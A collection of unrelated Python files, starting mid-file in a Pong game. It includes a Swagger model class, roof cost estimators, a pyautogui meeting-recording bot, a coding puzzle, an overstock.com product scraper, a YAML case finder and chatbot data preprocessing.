                        < MAX_VERTICAL_VELOCITY:
                    self.velocity[1] += paddle_deflection
                if math.fabs(self.velocity[0] * -1.05) < MAX_HORIZONTAL_VELOCITY:
                    self.velocity[0] *= -1.05
                else:
                    self.velocity[0] *= -1
                self.need_updated_intercept_position = True
                # Move and return
                self.rect.move_ip(self.velocity)
                self.surface.blit(original_background, (0, 0))
                return
        # check for top and bottom bounce
        if t_position.top < 0 + self.top_bottom_offset:
            self.velocity[1] *= -1.0
            self.need_updated_intercept_position = True
        # bottom edge bounce
        elif t_position.bottom > self.surface.get_height() - self.top_bottom_offset:
            self.velocity[1] *= -1.0
            self.need_updated_intercept_position = True
        #Check to see if we score
        elif t_position.right > self.surface.get_width():  # score
            #increase score for left player
            self.rect.top = (self.surface.get_height()/2)
            self.rect.left = (self.surface.get_width()/2)
            #set the new velocity to a random between initial and max
            self.velocity[0] = random.randint(self._initial_velocity[0], MAX_HORIZONTAL_VELOCITY)
            self.velocity[1] = random.randint(self._initial_velocity[1], MAX_VERTICAL_VELOCITY)
            self.velocity[0] *= -1.0  # change direction
            self.need_updated_intercept_position = True
            self.point_scored('left')
            self.force_score_side = 'none'
            #print 'balls track to ', self.paddle_track_to, self.rect.centery
            #return
        elif t_position.left < 0:
            #new ball
            self.rect.top = (self.surface.get_height()/2)
            self.rect.left = (self.surface.get_width()/2)
            #set the new velocity to a random between initial and max
            self.velocity[0] = random.randint(self._initial_velocity[0], MAX_HORIZONTAL_VELOCITY)
            self.velocity[1] = random.randint(self._initial_velocity[1], MAX_VERTICAL_VELOCITY)
            #self.velocity[0] *= -1 #change direction
            #print 'right player score - ball exited at: ' + str(t_position.top)
            self.point_scored('right')
            self.force_score_side = 'none'
            self.need_updated_intercept_position = True
            #print 'balls track to ', self.paddle_track_to, self.rect.centery
            #return
        #move using the new velocity
        self.rect.move_ip(self.velocity)
        self.surface.blit(original_background, (0, 0))
        if self.need_updated_intercept_position is True:
            self.update_intercept_location()
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
class RemotesupportConnectemcConnectemc(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        """
        RemotesupportConnectemcConnectemc - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'email_customer_on_failure': 'bool',
            'enabled': 'bool',
            'primary_esrs_gateway': 'str',
            'remote_support_subnet': 'str',
            'secondary_esrs_gateway': 'str',
            'use_smtp_failover': 'bool'
        }
        self.attribute_map = {
            'email_customer_on_failure': 'email_customer_on_failure',
            'enabled': 'enabled',
            'primary_esrs_gateway': 'primary_esrs_gateway',
            'remote_support_subnet': 'remote_support_subnet',
            'secondary_esrs_gateway': 'secondary_esrs_gateway',
            'use_smtp_failover': 'use_smtp_failover'
        }
        self._email_customer_on_failure = None
        self._enabled = None
        self._primary_esrs_gateway = None
        self._remote_support_subnet = None
        self._secondary_esrs_gateway = None
        self._use_smtp_failover = None

    @property
    def email_customer_on_failure(self):
        """
        Gets the email_customer_on_failure of this RemotesupportConnectemcConnectemc.
        Email the customer if all transmission methods fail.

        :return: The email_customer_on_failure of this RemotesupportConnectemcConnectemc.
        :rtype: bool
        """
        return self._email_customer_on_failure

    @email_customer_on_failure.setter
    def email_customer_on_failure(self, email_customer_on_failure):
        """
        Sets the email_customer_on_failure of this RemotesupportConnectemcConnectemc.
        Email the customer if all transmission methods fail.

        :param email_customer_on_failure: The email_customer_on_failure of this RemotesupportConnectemcConnectemc.
        :type: bool
        """
        self._email_customer_on_failure = email_customer_on_failure

    @property
    def enabled(self):
        """
        Gets the enabled of this RemotesupportConnectemcConnectemc.
        Enable ConnectEMC.

        :return: The enabled of this RemotesupportConnectemcConnectemc.
        :rtype: bool
        """
        return self._enabled

    @enabled.setter
    def enabled(self, enabled):
        """
        Sets the enabled of this RemotesupportConnectemcConnectemc.
        Enable ConnectEMC.

        :param enabled: The enabled of this RemotesupportConnectemcConnectemc.
        :type: bool
        """
        self._enabled = enabled

    @property
    def primary_esrs_gateway(self):
        """
        Gets the primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        Primary ESRS Gateway. Necessary to enable ConnectEMC.

        :return: The primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        :rtype: str
        """
        return self._primary_esrs_gateway

    @primary_esrs_gateway.setter
    def primary_esrs_gateway(self, primary_esrs_gateway):
        """
        Sets the primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        Primary ESRS Gateway. Necessary to enable ConnectEMC.

        :param primary_esrs_gateway: The primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        :type: str
        """
        self._primary_esrs_gateway = primary_esrs_gateway

    @property
    def remote_support_subnet(self):
        """
        Gets the remote_support_subnet of this RemotesupportConnectemcConnectemc.
        Network subnet to use for remote support. Necessary to enable ConnectEMC.

        :return: The remote_support_subnet of this RemotesupportConnectemcConnectemc.
        :rtype: str
        """
        return self._remote_support_subnet

    @remote_support_subnet.setter
    def remote_support_subnet(self, remote_support_subnet):
        """
        Sets the remote_support_subnet of this RemotesupportConnectemcConnectemc.
        Network subnet to use for remote support. Necessary to enable ConnectEMC.

        :param remote_support_subnet: The remote_support_subnet of this RemotesupportConnectemcConnectemc.
        :type: str
        """
        self._remote_support_subnet = remote_support_subnet

    @property
    def secondary_esrs_gateway(self):
        """
        Gets the secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        Secondary ESRS Gateway. Used if Primary is unavailable.

        :return: The secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        :rtype: str
        """
        return self._secondary_esrs_gateway

    @secondary_esrs_gateway.setter
    def secondary_esrs_gateway(self, secondary_esrs_gateway):
        """
        Sets the secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        Secondary ESRS Gateway. Used if Primary is unavailable.

        :param secondary_esrs_gateway: The secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
        :type: str
        """
        self._secondary_esrs_gateway = secondary_esrs_gateway

    @property
    def use_smtp_failover(self):
        """
        Gets the use_smtp_failover of this RemotesupportConnectemcConnectemc.
        Use SMTP if primary and secondary gateways are unavailable.

        :return: The use_smtp_failover of this RemotesupportConnectemcConnectemc.
        :rtype: bool
        """
        return self._use_smtp_failover

    @use_smtp_failover.setter
    def use_smtp_failover(self, use_smtp_failover):
        """
        Sets the use_smtp_failover of this RemotesupportConnectemcConnectemc.
        Use SMTP if primary and secondary gateways are unavailable.

        :param use_smtp_failover: The use_smtp_failover of this RemotesupportConnectemcConnectemc.
        :type: bool
        """
        self._use_smtp_failover = use_smtp_failover

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # BUGFIX: the original accessed other.__dict__ unconditionally, which
        # raised AttributeError when compared against a non-model object
        # (e.g. obj == None / obj == "x"). Return NotImplemented instead so
        # Python falls back to its default comparison.
        if not isinstance(other, RemotesupportConnectemcConnectemc):
            return NotImplemented
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
import pandas
def install_cost_solar(area: float) -> int:
    """
    Calculates the average cost of installing solar panels over a given area

    Info:
        1 Panel is 17.55 square feet, 1.63 m^2
        6 kW system requires 20 panels, 32.6 m^2
        $2.78 per Watt
        $512 per m^2

    :param area: Area to be covered in solar panels, in meters squared
    :return: Average cost of installing solar panels for given area, in CAD
    """
    # BUGFIX: multiply before truncating. The original int(512 * int(area))
    # floored the fractional square metres first, losing up to $511 of the
    # documented $512/m^2 cost.
    return int(512 * area)
def install_cost_green(area: float) -> int:
    """
    Calculates the average cost of installing a green roof over a given area

    Info:
        $240 per m^2

    :param area: Area to be covered, in meters squared
    :return: Average cost of installing a green roof for given area, in CAD
    """
    # BUGFIX: multiply before truncating (same premature flooring of the
    # fractional area as install_cost_solar had).
    return int(240 * area)
def create_cost_df(area_series: pandas.Series) -> pandas.DataFrame:
    """
    Creates a pandas DataFrame of the cost of solar and green roofing for given area series

    :param area_series: Pandas series with roof areas
    :return: Pandas DataFrame with columns ['SOLAR_COST', 'GREEN_COST']
    """
    size = area_series.shape[0]
    print('Generating area costs: ')
    rows = []
    # enumerate() replaces the hand-maintained counter; the progress line
    # printed for each roof is unchanged.
    for idx, area in enumerate(area_series):
        print(idx/size * 100, '%')
        rows.append((install_cost_solar(area), install_cost_green(area)))
    return pandas.DataFrame(rows, columns=['SOLAR_COST', 'GREEN_COST'])
if __name__ == "__main__":
    # Load the building-massing dataset and append per-roof cost estimates.
    massing_df = pandas.read_csv('DataSets/3DMassing_2018_WGS84_fixed.csv')
    # cost = []
    # for item in massing_df['SHAPE_AREA']:
    #     cost.append(install_cost_solar(item))
    # massing_df['SOLAR_COST'] = pandas.Series(cost)
    costdf = create_cost_df(massing_df['SHAPE_AREA'])
    massing_df['SOLAR_COST'] = costdf['SOLAR_COST']
    massing_df['GREEN_COST'] = costdf['GREEN_COST']
    print(massing_df)
|
import pyautogui as pag
import time
import csv
def enter_meeting():
    """Open the meeting via hard-coded screen clicks and shortcuts.

    NOTE(review): all coordinates assume a specific screen layout and
    resolution — recalibrate if the window arrangement changes.
    """
    pag.click(282, 459)  # at khub
    time.sleep(4)
    pag.hotkey("ctrl", "e")
    time.sleep(0.5)
    pag.hotkey("ctrl", "d")
    time.sleep(1)
    pag.click(992, 427)  # join at meet
    time.sleep(2)
def start_record():
    # Start the meeting recording through the overflow menu, then accept
    # the consent dialog. Coordinates are screen-layout specific.
    pag.click(1338, 675) # three buttons
    time.sleep(0.5)
    pag.click(1210, 238) # record button
    time.sleep(0.5)
    pag.click(929, 483) # accept consent
    time.sleep(10)
def stop_record():
    # Stop the recording through the same overflow menu used to start it.
    pag.click(1338, 675) # three buttons
    time.sleep(1)
    pag.click(1210, 238) # record button
    time.sleep(1)
    pag.click(797, 466) # stop recording
    time.sleep(1)
def leave_meeting():
    # Confirm the "send recording" dialog and close the browser tab.
    pag.click(682, 685) # accept send to sir emman
    time.sleep(1)
    pag.hotkey("ctrl", "w")
    time.sleep(1)
def chat(_names):
    # Post a greeting into the meeting chat for each name in rows 2..47
    # of the roster, one message per person.
    pag.click(1127, 89) # click chat
    time.sleep(1)
    # NOTE(review): the hard-coded 2..48 range assumes the roster has at
    # least 48 rows; a shorter list raises IndexError.
    for i in range(2, 48):
        pag.write("Magandang buhay!")
        pag.hotkey("shift", "enter") # newline without sending — confirm
        pag.write(_names[i])
        time.sleep(0.1)
        pag.press("enter")
        time.sleep(0.1)
    pag.click(1337, 102) # close chat
    time.sleep(1)
# Load the roster: column 1 of each CSV row holds the attendee name.
with open("Files/p6.csv") as sfile:
    cread = csv.reader(sfile, delimiter=",")
    names = [row[1] for row in cread]
time.sleep(1)
print(pag.position()) # printed to help recalibrate the hard-coded coords
# Run one full meeting session: join, record, greet everyone, stop, leave.
for i in range(1):
    enter_meeting()
    start_record()
    chat(names)
    stop_record()
    leave_meeting()
|
class Solution:
    def coverPoints(self, X, Y):
        """Minimum number of steps to visit all points in order.

        One step changes x, y, or both by 1 (king moves), so the cost
        between consecutive points is the Chebyshev distance
        max(|dx|, |dy|).

        :param X: list of integers (x coordinates, visited in order)
        :param Y: list of integers (y coordinates)
        :return: total number of steps (int)
        """
        steps = 0
        prev_x, prev_y = X[0], Y[0]
        for cur_x, cur_y in zip(X[1:], Y[1:]):
            steps += max(abs(prev_x - cur_x), abs(prev_y - cur_y))
            prev_x, prev_y = cur_x, cur_y
        return steps
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# encoding=utf8
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import requests
from bs4 import BeautifulSoup, SoupStrainer
import Tkinter
from lxml import html
import openpyxl
from time import sleep
def center(toplevel):
    """Center the given toplevel window on the screen, keeping its size."""
    toplevel.update_idletasks()
    screen_w = toplevel.winfo_screenwidth()
    screen_h = toplevel.winfo_screenheight()
    # geometry() returns "WxH+X+Y"; keep only the WxH part.
    win_w, win_h = (int(part) for part in toplevel.geometry().split('+')[0].split('x'))
    offset_x = screen_w/2 - win_w/2
    offset_y = screen_h/2 - win_h/2
    toplevel.geometry("%dx%d+%d+%d" % (win_w, win_h, offset_x, offset_y))
class simpleapp_tk(Tkinter.Tk):
    """Minimal Tkinter front-end: a URL entry, a file-name entry and a
    'Scrape !' button that runs the overstock scraper (`this`)."""
    def __init__(self,parent):
        Tkinter.Tk.__init__(self,parent)
        self.parent = parent
        self.initialize()
    def initialize(self):
        """Build and lay out all widgets."""
        self.grid()
        # URL entry (row 0).
        self.entryVariable = Tkinter.StringVar()
        self.entry = Tkinter.Entry(self,textvariable=self.entryVariable)
        self.entry.grid(column=0,row=0,sticky='EW', padx=10, pady=10)
        self.entry.bind("<Return>", self.OnPressEnter)
        # Output file-name entry (row 1).
        self.entryVariable2 = Tkinter.StringVar()
        self.entry2 = Tkinter.Entry(self,textvariable=self.entryVariable2)
        self.entry2.grid(column=0,row=1,sticky='EW', padx=10, pady=0)
        self.entry2.bind("<Return>", self.OnPressEnter)
        self.entryVariable.set(u"Enter Url here.")
        self.entryVariable2.set(u"Enter File name here.")
        button = Tkinter.Button(self,text=u"Scrape !",
                                command=self.OnButtonClick)
        button.grid(column=1,row=0, padx=10, pady=10)
        # Status label (row 2).
        self.labelVariable = Tkinter.StringVar()
        label = Tkinter.Label(self,textvariable=self.labelVariable,
                              anchor="w",fg="white",bg="blue", padx=10, pady=10)
        label.grid(column=0,row=2,columnspan=2,sticky='EW', padx=10, pady=10)
        self.labelVariable.set(u"Hello Qman55!")
        self.grid_columnconfigure(0,weight=1)
        # Horizontally resizable only.
        self.resizable(True,False)
        self.update()
        self.geometry(self.geometry())
        self.entry.focus_set()
        self.entry.selection_range(0, Tkinter.END)
    def OnButtonClick(self):
        """Run the scraper with the entered URL/file name, then quit."""
        url = self.entryVariable.get()
        bookname = self.entryVariable2.get()
        self.labelVariable.set(u"Please wait while the bot scrapes ...")
        this(url, bookname)
        self.labelVariable.set(u"Finished!")
        sleep(10)
        exit()
        # NOTE(review): unreachable — exit() above terminates the process.
        self.entry.focus_set()
        self.entry.selection_range(0, Tkinter.END)
    def OnPressEnter(self,event):
        """Echo the URL entry's contents into the status label."""
        self.labelVariable.set( self.entryVariable.get()+" (You pressed ENTER)" )
        self.entry.focus_set()
        self.entry.selection_range(0, Tkinter.END)
def gh(url):
    """Collect product-detail hrefs from an overstock search-results page.

    Follows the 'next' pagination link (currently capped at a single page
    via range(1)) and keeps at most the first 4 product links per page.

    :param url: search-results URL to start from
    :return: list of product href strings
    """
    all_products = []
    prod_pages = []  # NOTE(review): populated but never read
    prod_pages.append(url)
    for page_num in range(1):
        try:
            # go get a url
            print(url)
            response = requests.get(url)
            soup = BeautifulSoup(response.content, 'html.parser')
            #pprint(soup)
            #"product-wrapper tile-view"
            products = soup.find_all('a', {"class": "product-link"})
            #print(products)
            # GET INDIVIDUAL href from product div tag, first 4 only.
            counter = 0
            for product in products:
                if counter < 4 :
                    all_products.append(product['href'])
                counter += 1
            # GET INDIVIDUAL href from product div tag
            # for product in products:
            #     all_products.append(product['href'])
            # find the next-page button href
            elem = soup.find("a", {"class": "next"})
            # it becomes the new url
            url = (elem['href'])
        except Exception as e:
            # Any failure (no 'next' link, network error) ends pagination.
            #print(all_products)
            #raise e
            break
    print(str(len(all_products))+ " Total Products of this search...")
    # NOTE(review): bare `print` is Python-2 style; under Python 3 this
    # line evaluates the function object and prints nothing.
    print
    print("'The scraper is now getting info of individual searched products and saving them to your workbook'")
    print
    return all_products
def this(url, xl):
    """Scrape product details for an overstock.com search and save them
    to an .xlsx workbook.

    :param url: search-results URL; expanded to product links via gh()
    :param xl: output workbook file name ('.xlsx' appended if missing)

    One worksheet row is written per product. Every field is scraped in
    its own try/except so a missing element only blanks that cell.
    """
    print
    print("'This scraper mines custom search product info from https://www.overstock.com'")
    print("'Please use a file name that doesnot contain spaces, no special characters and please be case sensitive'")
    print
    if not ".xlsx" in xl:
        xl = str(xl) + '.xlsx'
    else:
        pass
    # Workbook with one header row; columns match `heads` below.
    book = openpyxl.Workbook()
    active_sheet = book.active
    active_sheet.title = "overstock"
    rowNum = 1
    heads = ['Title', 'Price1', 'Price2', 'Shipping', 'Return', 'Category', 'Reviews', 'Review Average', 'Low Quantity',
             'OOS', 'New Arrival', 'Clearance', 'Top Seller', 'Exclusive', 'Special', 'Weekly Deals', 'Variations', 'Rewards',
             'Link']
    for colNum in range(1, 20):
        val = heads[colNum-1]
        active_sheet.cell(row=rowNum, column=colNum).value = val
    # scrape them, product by product
    for url in gh(url):
        print(url)
        print('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
        rowNum = rowNum+1
        active_sheet.cell(row=rowNum, column=19).value = str(url)
        # Fetch the product page; retry once after 10s on failure.
        try:
            response = requests.get(url)
            soup = BeautifulSoup(response.content, 'html.parser')
        except Exception as e:
            sleep(10)
            response = requests.get(url)
            soup = BeautifulSoup(response.content, 'html.parser')
        try:
            # prod title
            elem_value = (soup.find('h1')).text.strip()
            active_sheet.cell(row=rowNum, column=1).value = str(elem_value)
            elem_value = " ".join(elem_value.split())
            print(elem_value, 'title')
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # price1
            elem_value = soup.find('span', {"class": "monetary-price-value"})['content']
            active_sheet.cell(row=rowNum, column=2).value = str(elem_value)
            print(elem_value, 'price')
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # price2
            elem_value = soup.find('span', {"class": 'reference-price'}).text.strip()
            active_sheet.cell(row=rowNum, column=3).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # shipping and return policy, matched by their h5 headings
            elems = soup.find('div', {"class": 'shipping-returns'})
            h5s = elems.find_all('h5')
            ps = elems.find_all('p')
            for elem in h5s:
                if 'Shipping:' == str(elem.text):
                    index = h5s.index(elem)
                    elem_value = elem.find_next('p').text.strip()
                    print(elem_value, 'shipping')
                    active_sheet.cell(row=rowNum, column=4).value = str(elem_value)
                elif 'Standard Return Policy:' in str(elem):
                    elem_value = elem.text
                    print(elem_value, 'return shipping')
                    active_sheet.cell(row=rowNum, column=5).value = str(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # category (third breadcrumb entry)
            elems = soup.find('ul', {"class": 'breadcrumbs'})
            elems = elems.find_all('li')
            elem_value = elems[2].text.strip()
            print(elem_value)
            active_sheet.cell(row=rowNum, column=6).value = str(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # reviews
            elem_value = soup.find('span', {"class": "count"}).text.strip()
            active_sheet.cell(row=rowNum, column=7).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # average review
            elem_value = soup.find('div', {"class": "overall-rating"}).text.strip()
            active_sheet.cell(row=rowNum, column=8).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # low quantity verified
            elem_value = soup.find('div', {"class": "sellout-risk"}).text.strip()
            active_sheet.cell(row=rowNum, column=9).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # out of stock -- verified
            elem_value = soup.find('div', {"class": "out-of-stock-label"}).text.strip()
            active_sheet.cell(row=rowNum, column=10).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # promo badges: new arrival / flash deal / top seller / clearance
            elem_values = soup.find_all('div', {"class": "message"})
            for elem in elem_values:
                elem_value = elem.text.strip()
                if 'New Arrival' in elem_value:
                    elem_value = 'New Arrival'
                    print(elem_value)
                    active_sheet.cell(row=rowNum, column=11).value = str(elem_value)
                elif 'Flash Deal' in elem_value:
                    # NOTE(review): Flash Deal is printed but never written
                    # to a cell — confirm whether a column was intended.
                    elem_value = 'Flash Deal'
                    print(elem_value)
                elif 'Top Seller' in elem_value:
                    elem_value = 'Top Seller'
                    print(elem_value)
                    active_sheet.cell(row=rowNum, column=13).value = str(elem_value)
                elif 'Clearance' in elem_value:
                    elem_value = 'Clearance'
                    print(elem_value)
                    active_sheet.cell(row=rowNum, column=12).value = str(elem_value)
                else:
                    elem_value = ''
                    print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # exclusive - ver
            elem_value = soup.find('div', {"class": "clickable-icon"}).text.strip()
            if "exclusive" in str(elem_value).lower():
                elem_value = 'Exclusive'
            else:
                elem_value = ''
            active_sheet.cell(row=rowNum, column=14).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # special
            elem_value = soup.find('div', {"class": "clickable-icon"}).text.strip()
            if "special" in str(elem_value).lower():
                elem_value = 'Special'
            else:
                elem_value = ''
            active_sheet.cell(row=rowNum, column=15).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # weekly deals -
            elem_value = soup.find('span', {"class": "clickable-icon"})
            if "weekly" in str(elem_value).lower():
                elem_value = elem_value['title']
            else:
                elem_value = ''
            active_sheet.cell(row=rowNum, column=16).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # options -- variations (e.g. "Color & Size")
            elem_values = soup.find('div', {"id": "optbreakout"})
            titles = elem_values.find_all('h4')
            titles = [h4.text.strip() for h4 in titles]
            elem_value = " & ".join(titles)
            print(elem_value)
            active_sheet.cell(row=rowNum, column=17).value = str(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        try:
            # rewards - ver //*[@id="clubo-container"]/div[3]/p[2]
            elem_value = soup.find('p', {"class": "co-me-rewards"}).text.strip()
            active_sheet.cell(row=rowNum, column=18).value = str(elem_value)
            print(elem_value)
        except Exception as e:
            print(e) #reason.
            pass
        print("Product " +str(rowNum)+ "'-Saved!'")
        print
        print
        print
    # Save once after all products are written.
    book.save(xl)
if __name__ == "__main__":
    # NOTE(review): `headers` is built but never passed to requests.get,
    # so every request goes out with the default python-requests UA.
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
               'Accept-Encoding': 'none',
               'Accept-Language': 'en-US,en;q=0.8',
               'Connection': 'keep-alive'}
    # Launch the Tkinter UI, centered on screen.
    app = simpleapp_tk(None)
    app.title('OVERSTOCK.COM SCRAPER')
    app.geometry('{}x{}'.format(750, 129))
    center(app)
    app.mainloop()
#!/usr/bin/python
# -*- coding: iso-8859-1 -*- |
# -*- coding: utf-8 -*-
import sys
sys.path.append(('..'))
import lib.Utils as U
import os
@U.log_flie_function()
def get_case_yaml_path():
    """Return {file name: full path} for every .yaml case file under the
    directory configured at [test_case] case in the project ini."""
    ini = U.ConfigIni()
    yaml_path = ini.get_ini('test_case','case')
    return get_all_case(yaml_path,'.yaml')
def get_all_case(directory, extension_name):
    """Recursively collect files under *directory*.

    A file is kept when its name ends with *extension_name* and does not
    contain the substring 'filter'.

    :param directory: root directory to walk
    :param extension_name: required file suffix, e.g. '.yaml'
    :return: dict mapping file name -> full path
    """
    matches = {}
    for root, _dirs, names in os.walk(directory):
        for name in names:
            if 'filter' in name:
                continue
            if not name.endswith(extension_name):
                continue
            matches[name] = os.path.join(root, name)
    return matches
if __name__ == '__main__':
    # Smoke test: print the type of the discovered case-file mapping.
    # Fix: `print type(a)` is Python-2-only statement syntax;
    # print(type(a)) behaves the same on both Python 2 and 3.
    a = get_case_yaml_path()
    print(type(a))
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 26 11:41:17 2018
Building a chatbot with NLP
@author: CURIACOSI1
"""
import numpy as np
import tensorflow as tf
import re
import time
############## PART 1 - DATA PREPROCESSING #################
# Importing the datasets
# (movie_lines/movie_conversations look like the Cornell movie-dialogs
# corpus layout — TODO confirm the files sit next to this script)
lines = open('movie_lines.txt', encoding = 'utf-8', errors = 'ignore').read().split('\n')
conversations = open('movie_conversations.txt', encoding = 'utf-8', errors = 'ignore').read().split('\n')
# Creating a dictionary that maps each line and its id
id2line ={}
for line in lines:
    _line= line.split('+++$+++')
    # Only well-formed rows have exactly 5 '+++$+++'-separated fields.
    if len(_line) == 5:
        id2line[_line[0].replace(" ", "")] = _line[4]
# Creating a list of all the conversations
conversation_ids = []
for conversation in conversations[:-1]: # The last row is empty
    # take the last field and remove the square brackets and quotes
    _conversation = conversation.split('+++$+++')[-1][2:-1].replace("'", "").replace(" ", "")
    conversation_ids.append(_conversation.split(','))
# Getting seperately the questions and the answers
# NOTE: In the 'conversation_ids' list the first code of every element is the question
# and the second code is the answer
questions = []
answers = []
for conversation in conversation_ids:
    # Each consecutive pair of lines becomes a (question, answer) sample.
    for i in range(len(conversation) -1):
        questions.append(id2line[conversation[i]])
        answers.append(id2line[conversation[i+1]])
# Cleaning of the text
def clean_text(text):
    """Normalise a dialogue line for the chatbot vocabulary.

    Lower-cases the text, expands common English contractions, strips
    punctuation/special characters, and collapses runs of spaces.

    :param text: raw dialogue line
    :return: cleaned string
    """
    text = text.lower()
    # Expand contractions first, while the apostrophes still exist.
    text = re.sub(r"i'm", "i am", text)
    text = re.sub(r"he's", "he is", text)
    text = re.sub(r"she's", "she is", text)
    text = re.sub(r"that's", "that is", text)
    text = re.sub(r"what's", "what is", text)
    text = re.sub(r"where's", "where is", text)
    text = re.sub(r"there's", "there is", text)
    text = re.sub(r"won't", "will not", text)
    text = re.sub(r"can't", "cannot", text)
    text = re.sub(r"can ' t", "cannot", text)
    text = re.sub(r"didn't", "did not", text)
    text = re.sub(r"don't", "do not", text)
    text = re.sub(r"doesn't", "does not", text)
    text = re.sub(r"aren't", "are not", text)
    text = re.sub(r"isn't", "is not", text)
    text = re.sub(r"haven't", "have not", text)
    text = re.sub(r"couldn't", "could not", text)
    text = re.sub(r"it's", "it is", text)
    text = re.sub(r"\'ll", " will", text)
    text = re.sub(r"\'ve", " have", text)
    text = re.sub(r"\'d", " would", text)
    text = re.sub(r"\'re", " are", text)
    # Strip slashes, brackets, quotes and remaining punctuation.
    text = re.sub(r"\\", "", text)
    text = re.sub(r"/", "", text)
    text = re.sub(r"\[", "", text)
    text = re.sub(r"\]", "", text)
    text = re.sub(r'"', '', text)
    text = re.sub(r"[-|'.&?*,;:<>{}!]", "", text)
    text = re.sub(r'[-#%".]', "", text)
    text = re.sub(r"[-@+=-]", "", text)
    text = re.sub(r"[-()$]", "", text)
    # Fix: collapse runs of spaces. The original pattern r" " replaced a
    # single space with a single space — a no-op.
    text = re.sub(r" +", " ", text)
    text = text.strip()
    return text
# Cleaning questions
clean_questions = []
for question in questions:
    clean_questions.append(clean_text(question))
# Cleaning answers
clean_answers = []
for answer in answers:
    clean_answers.append(clean_text(answer))
# Mapping the words occurences in order to remove not frequent words
word2count = {}
for question in clean_questions:
    for word in question.split():
        if word not in word2count:
            word2count[word] = 1
        else:
            word2count[word] += 1
for answer in clean_answers:
    for word in answer.split():
        if word not in word2count:
            word2count[word] = 1
        else:
            word2count[word] +=1
# FILTERING AND TOKENIZATION
# Creating two dictionaries that map the questions words and the answer words to unique integer
threshold = 20
questionwords2int ={}
word_number = 0
for word, count in word2count.items():
    if count >= threshold:
        questionwords2int[word] = word_number
        word_number +=1
answerwords2int ={}
word_number = 0
for word, count in word2count.items():
    if count >= threshold:
        answerwords2int[word] = word_number
        word_number +=1
# Adding the last tokens to the two dictionaries
tokens = ['<PAD>', '<EOS>', '<OUT>', '<SOS>']
# NOTE(review): token ids are assigned as len(dict) + 1, so id len(dict)
# is skipped and <PAD> does not get id 0 — confirm this is intentional.
for token in tokens:
    questionwords2int[token] = len(questionwords2int) + 1
for token in tokens:
    answerwords2int[token] = len(answerwords2int) + 1
# Creating the inverse dictionary of the answerwords2int dictionary
answerints2word = {w_i: w for w, w_i in answerwords2int.items()}
# Adding the End of String token to the end of every answer
for i in range(len(clean_answers)):
    clean_answers[i] += ' <EOS>'
# Translate all the questions and answers (clean_answers, clean_questions)
# into the unique integer that was mapped into answerints2word
# and replacing all the words that were filtered out with <OUT>
questions_to_int = []
for question in clean_questions:
    ints = []
    for word in question.split():
        if word not in questionwords2int:
            ints.append(questionwords2int['<OUT>'])
        else:
            ints.append(questionwords2int[word])
    questions_to_int.append(ints)
answers_to_int = []
